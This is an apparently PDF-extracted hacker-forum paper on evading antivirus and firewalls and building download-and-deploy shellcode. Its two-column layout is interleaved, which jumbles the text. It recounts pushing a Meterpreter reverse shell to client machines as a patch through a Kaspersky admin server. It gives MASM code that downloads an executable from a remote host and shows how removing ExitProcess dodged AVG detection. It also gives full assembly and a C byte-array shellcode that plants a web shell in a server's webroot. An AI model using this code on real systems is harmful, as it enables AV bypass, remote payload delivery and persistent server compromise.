http://www.Garage4Hackers.

com A Garage for “Hackers and Security Professionals”

Any way we dint give up and started attacking

Antivirus/ Firewall the AV Admin server itself, and woot woot we
Evasion Techniques: were in.

Am not gone mention how I got in

Evolution of Download Deploy coz u will laugh
Shellcode
and that is not the point , the point is I was able
[FB1H2S aka Rahul Sasi] to get an RDP to Kaspersky admin server
machine. And the fun begins.
http://fb1h2s.com
http://garage4hackers.com As it was Kasper-sky Admin server, and all the
network machines were connected to it, and
Overview: Admin server manages everything from
updating individual computers with updates
The effectiveness of an Anti virus/ Firewall is
form patching the server.
highly valued to it customers and in scenarios of
a PenTest. This post talks about a serious of
observations and techniques tried in order to Screenshots not live: form Kaspersky website:
bypass AV and evaluate AV/Firewall's
effectiveness and the development of
Download Deploy payload.

What made me write this?

I was assigned with a PT which we were able to

achieve 100% percent success. And the success
rates were because of an Anti virus Server, ok
here is the incident. [Skip this, its boring]

After completing VA we moved on to PT, a good

no of un patched windows systems were
spotted so we armed msf(Metsploit) and
started shooting, but exploits failed , and no
What quickly strike me was the Push patches
metpreters or Cmd shells came back. Well all
options which were used to update client
because of a stupid AV server. A Kasper-sky
computer with patches and installers, quick
server was running and that was used to
taught!
manage the entire network. Well payload
encoding work but, certain vulnerabilities What If I make a Metpreter_reverse_tcp and
multiple exploitation is not possible so if you fail push it as a patch to the client computers will it
first you will lose the game, so different ideas work??
and taught s popped in my head and this paper
is an implementation of that.

Original Thread: http://www.garage4hackers.com/showthread.php?708-Antivirus-Firewall-Evasion-Techniques-

Evolution-of-Download-Deploy-Shellcode
 http://www.Garage4Hackers.com A Garage for “Hackers and Security Professionals”

[2] I had situation before too, were server was

behind a firewall and was not able to get
reverse/bind shell because of AV/Firewall I
need a way to bypass that.
[3] Will the things I did above could be done
with a domain controller too?

Answer to Q no [3] by Wirless Punter"

suggested a better strategy which he tried
before.
[-] Make a VBS or Bat script which creates a new
Steps:
user and then enable telnet.
[+] Made the metpreter and moved to Admin
[-] Push the script as update, simple and very
server
effective "
[-] Admin server dint detect the default non
encoded metpreter as a virus , No idea why :O
Question No [1] and [2]'s answer is what this
[+] Shut down the remote AV client form admin
paper is all about
server
[-] Kaspersky Admin kit had a feature to build an
installer out of an executable
[+] Converted the metpreter .exe to .msi
installer, seems like the AV signs the payload
when this is done
[+] Pushed it to client
And royal woot woot we had a metpreter, same
way we could have shelled the entire network ,
took enough POCs and headed home.
Thanks to D4rkest for his great support and
ideas.

Well PT was over but few question remained

And the best way to hack an application is

RTFM[Read the f$$$$$# manual]
http://utils.kaspersky.com/docs/engl...admguid
een.pdf

[1] Why did the AV admin server dint detect the

Msf non encoded payload when moved to
admin server, when it was getting detected on
client machines?

Original Thread: http://www.garage4hackers.com/showthread.php?708-Antivirus-Firewall-Evasion-Techniques-

Evolution-of-Download-Deploy-Shellcode
 http://www.Garage4Hackers.com A Garage for “Hackers and Security Professionals”

Anti Virus Evading techniques, and ;------------------------------------------

analyzing the quality of an AV -
; Comilied with MASM32
.586
.model flat,stdcall
option casemap:none
Signature based detection: Analyzing
include C:\masm32\include\windows.inc
Efficacy and Bypassing detection include C:\masm32\include\user32.inc
include C:\masm32\include\kernel32.inc
Wiki: include C:\masm32\include\shell32.inc
include C:\masm32\include\urlmon.inc
http://en.wikipedia.org/wiki/Antivirus_software
includelib \masm32\lib\user32.lib
Compares the contents of a file to a dictionary includelib \masm32\lib\kernel32.lib
of virus signatures. includelib \masm32\lib\shell32.lib
includelib \masm32\lib\urlmon.lib
Analyzing the efficacy of an AV:
.data
URL db "http://110.0.0.1:84/msgbox.exe",0
Test 1 EXIT db "ExitProcess"
PATH db "c:\testsas.exe",0
Testing for false positives, I started with a
simple test shell code program, a skeleton that's .data
res dd ?
used to execute test shell codes, added few Nop
instruction to it, "currently the exe is absolutely .code
harmless".
#include<stdio.h> ; --------------------http://FB1H2S.com
char code[]="/x90/x90"; fb1h2s http://Garage4Hackers.com-----------
int main(int argc, char **argv) -------------------------------------------
{ -
int (*func)();
func = (int (*)()) code;
(int)(*func)(); start:
}
invoke URLDownloadToFile,0,addr URL,addr
PATH,0,0
invoke ExitProcess,0

Uploaded to Virus total and obtained the

following results. end start
Here , Here: Ya one False positive by Quick heal.

[-] Moved form C to ASM as now we could

strike a little deeper
[-] Build a quick download virus to destination
payload

Original Thread: http://www.garage4hackers.com/showthread.php?708-Antivirus-Firewall-Evasion-Techniques-

Evolution-of-Download-Deploy-Shellcode
 http://www.Garage4Hackers.com A Garage for “Hackers and Security Professionals”

And on compiling and linking the application Without exit function the payload still works
itself my AVG scanner popped alerting me the output executable was scanned and and my
about the payload. AVG said it was clean.

And that's how signature based detection works

how dump it is.
So function calls Urldownloadtofile + Exit
process the combination would be what AVG
would have build its signature with. Ok so what
if I remove Exitprocess and compile the Heuristics: Considering shell codes it’s
program. not affected much
;-------------------------------------------
Runs the payload on a sandbox and identifies
; Comilied with MASM32 the behavior: AV plants hooks to certain critical
.586
.model flat,stdcall system calls and monitors those activities , so
option casemap:none
Reverse/Bind shell and socket operations are at
include C:\masm32\include\windows.inc times an Issue.
include C:\masm32\include\user32.inc
include C:\masm32\include\kernel32.inc
include C:\masm32\include\shell32.inc
include C:\masm32\include\urlmon.inc So the taught is how to bypass Signature
includelib \masm32\lib\user32.lib
Detection + above mentioned Heuristics +
includelib \masm32\lib\kernel32.lib Firewall issues
includelib \masm32\lib\shell32.lib
includelib \masm32\lib\urlmon.lib

.data DownLoadFile + ExcuteFile + ExitProcess

URL db "http://110.0.0.1:84/msgbox.exe",0
EXIT db "ExitProcess"
PATH db "c:\testsas.exe",0

.data
No way this could escape the heuristic behavior
res dd ? , well downloading a program won't create
.code much panic but trying to execute it would cause
suspicion .Well obviously it would not be of any
; --------------------http://FB1H2S.com fb1h2s use if the payload just downloads the file and
http://Garage4Hackers.com-----------------------
-------------------------------- dsn't trigger it, and triggering it is where the
problem occurs.
start:

invoke URLDownloadToFile,0,addr URL,addr So what is the alternative?

PATH,0,0
;invoke ExitProcess,0
Original Thread: http://www.garage4hackers.com/showthread.php?708-Antivirus-Firewall-Evasion-Techniques-
Evolution-of-Download-Deploy-Shellcode
end start
 http://www.Garage4Hackers.com A Garage for “Hackers and Security Professionals”

;#File: Download_deploy.asm
[+] Download Execute will cause troubles to our ;
[BITS 32]
payload.
global _start
[-] If we just download the executable that
won’t be of any use _start:

[+] And AV/Firewall could make situations tough jmp short entry ;

by not letting us give reverse shell %include "kernal32.asm"

[+] And if the application we are begin:
targeting[Apache old version] is behind a call find_kernel32
mov ebx, eax
firewall and even if we were able to execute jmp short u ; Skip
code we can’t get a shell back because of the entry:
firewall. call begin

[-] So why not use a web shell , some Php or u:

push 0xec0e4e8e ; LoadLibraryA hash
asp shell if target has got a web server. push ebx ; kernel32 base address
call find_function ; find address
[+] A payload that would download a web shell
and place it on the servers WebRoot directory. ; LoadLibraryA
PUSH 0x00206e6f
Or simply writes a new web shell . PUSH 0x6d6c7275
xor ecx, ecx
mov [esp + 9],cl
mov ecx , esp
All firewall let's web server's traffic and push ecx
WebShell's "Hardly I have seen any getting call eax ; eax holds our function
address
detected by AV" . So that budded the idea of a
download:
Download + Deploy payload. push 0x702f1a36 ; URLDownloadToFileAhash
push eax ; u-lmon.dll base address
call find_function ; find address

Download + Executes triggers AV alert pop edi

xor ebp, ebp
So just Download a WebShell and PUSH 0x58202020 ; path to deploy
PUSH 0x7073612e
drops it in WebRoot PUSH 0x735c746f
PUSH 0x6f727777
PUSH 0x775c6275
PUSH 0x7074656e
PUSH 0x495c3a43
mov ebp , esp
You could get a semi interactive shell and will xor ecx, ecx ; ecx = 0 we need it
work fine even in case of AV and firewall. mov [ebp + 24], cl ;ebp no null
PUSH 0x58202065 ; url to file
##################################### PUSH 0x78652e61
PUSH 0x2f34383a
# Title ownload Deploy Shell code by FB1H2S PUSH 0x312e302e
PUSH 0x302e3732
# Date: [18/1/2011] PUSH 0x312f2f3a
# Author: FB1H2S PUSH 0x70747468
mov edi, esp
# Tested on: [Works form win xp to Win 7 all mov [edi + 25], cl ; edi no null
push ecx ; lpfnCB
versions] push ecx ; dwReserved
push ebp ; szFileName
# Paths hardcoded, could port to msf push edi ;url
#Place the webshell to be uploaded on ur local push ecx ; pCaller
call eax ; eax holds our function a
server webroot
exit:
push 0x73e2d87e ; ExitProcess hash
push ebx ; kernel32 base address
call find_function ; find address
; ExitProcess
call eax ; holds our function address
Original Thread: http://www.garage4hackers.com/showthread.php?708-Antivirus-Firewall-Evasion-Techniques-
Evolution-of-Download-Deploy-Shellcode
 http://www.Garage4Hackers.com A Garage for “Hackers and Security Professionals”

;# Test the Shell Code:

;#
;#Code file: kernal.asm
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Code:
;;;;;;;;;;;;;;
// Download file form location
find_kernel32: //Url hardcoded so not Use full for all
xor eax, eax ; clear eax yet
mov eax, [fs:0x30 ] ; pointer to the PEB #include<stdio.h>
mov eax, [ eax + 0x0C ] ; get PEB->Ldr
mov eax, [ eax + 0x14 ] ; get PEB- char code[] =
>Ldr.InMemoryOrderModuleList.Flink "\xeb\x70\x31\xc0\x64\xa1\x30\x00"
; (1st entry) "\x00\x00\x8b\x40\x0c\x8b\x40\x14"
mov eax, [ eax ] ; (2nd entry) "\x8b\x00\x8b\x00\x8b\x40\x10\xc3"
mov eax, [ eax ] ; (3rd entry)
mov eax, [ eax + 0x10 ] ;3rd entries base "\x60\x8b\x6c\x24\x24\x8b\x45\x3c"
address "\x8b\x54\x05\x78\x01\xea\x8b\x4a"
; eax = kernel32.dll works on all windows "\x18\x8b\x5a\x20\x01\xeb\xe3\x37"
versions xp to win 7 "\x49\x8b\x34\x8b\x01\xee\x31\xff"
ret
"\x31\xc0\xfc\xac\x84\xc0\x74\x0a"
"\xc1\xcf\x0d\x01\xc7\xe9\xf1\xff"
find_function: "\xff\xff\x3b\x7c\x24\x28\x75\xde"
pushad ; Save all "\x8b\x5a\x24\x01\xeb\x66\x8b\x0c"
registers
mov ebp, [esp + 0x24] "\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04"
mov eax, [ebp + 0x3c] "\x8b\x01\xe8\x89\x44\x24\x1c\x61"
mov edx, [ebp + eax + 0x78] "\xc3\xe8\x94\xff\xff\xff\x89\xc3"
add edx, ebp "\xeb\x05\xe8\xf2\xff\xff\xff\x68"
mov ecx, [edx + 0x18]
mov ebx, [edx + 0x20] "\x8e\x4e\x0e\xec\x53\xe8\x96\xff"
add ebx, ebp "\xff\xff\x68\x6f\x6e\x20\x00\x68"
find_function_loop: "\x75\x72\x6c\x6d\x31\xc9\x88\x4c"
jecxz find_function_finished "\x24\x09\x89\xe1\x51\xff\xd0\x68"
dec ecx
mov esi, [ebx + ecx * 4] "\x36\x1a\x2f\x70\x50\xe8\x76\xff"
add esi, ebp "\xff\xff\x5f\x31\xed\x68\x20\x20"
"\x20\x00\x68\x2e\x61\x73\x70\x68"
compute_hash: "\x6f\x74\x5c\x73\x68\x77\x77\x72"
xor edi, edi ; Zero edi
xor eax, eax ; Zero eax "\x6f\x68\x75\x62\x5c\x77\x68\x6e"
cld ; Clear "\x65\x74\x70\x68\x43\x3a\x5c\x49"
direction "\x89\xe5\x31\xc9\x88\x4d\x18\x68"
"\x65\x20\x20\x00\x68\x61\x2e\x65"
compute_hash_again:
lodsb ; Load the "\x78\x68\x3a\x38\x34\x2f\x68\x2e"
next byte from esi into al "\x30\x2e\x31\x68\x32\x37\x2e\x30"
test al, al ; Test "\x68\x3a\x2f\x2f\x31\x68\x68\x74"
ourselves. "\x74\x70\x89\xe7\x88\x4f\x1a\x51"
jz compute_hash_finished ; If the ZF
is set, we've hit the null term. "\x51\x55\x57\x51\xff\xd0\x68\x7e"
ror edi, 0xd ; Rotate "\xd8\xe2\x73\x53\xe8\x0f\xff\xff"
edi 13 bits to the right "\xff\xff\xd0";
add edi, eax ; Add the int main(int argc, char **argv)
new byte to the accumulator
jmp compute_hash_again ; Next {
iteration int (*func)();
func = (int (*)()) code;
compute_hash_finished: (int)(*func)();
find_function_compare:
cmp edi, [esp + 0x28] }
jnz find_function_loop
mov ebx, [edx + 0x24]
add ebx, ebp
mov cx, [ebx + 2 * ecx]
mov ebx, [edx + 0x1c]
add ebx, ebp
mov eax, [ebx + 4 * ecx]
add eax, ebp
Original
movThread:
[esphttp://www.garage4hackers.com/showthread.php?708-Antivirus-Firewall-Evasion-Techniques-
+ 0x1c], eax
Evolution-of-Download-Deploy-Shellcode
find_function_finished:
popad ; Restore
all registers
ret
 http://www.Garage4Hackers.com A Garage for “Hackers and Security Professionals”

[+] Issues: Url and path are Hard Coded so its

Use less I published the code to get suggestions
so that I could make an Improved version of
code and make a Metsploit module
[-] Currently Web Root path is Hard coded and I
can’t think about a way if web root is changed
[-] Need a solution to dynamically finds the web
roots IIS and Apache to make the Shell code
better.

[-] Codes and betters images form:

http://www.garage4hackers.com/showthread.p
hp?708-Antivirus-Firewall-Evasion-Techniques-
Evolution-of-Download-Deploy-Shellcode

#And all greets to Garage Hackers and Null

Members.

#http://www.garage4hackers.com/forum.php
B0Nd,Eberly,Wipu,Vinnu,w4ri0r,empty,neo,Ro
hith,Sids786,SmartKD,Tia,d4rkest,Atul,beenu,
Nishant,prashant

Original Thread: http://www.garage4hackers.com/showthread.php?708-Antivirus-Firewall-Evasion-Techniques-

Evolution-of-Download-Deploy-Shellcode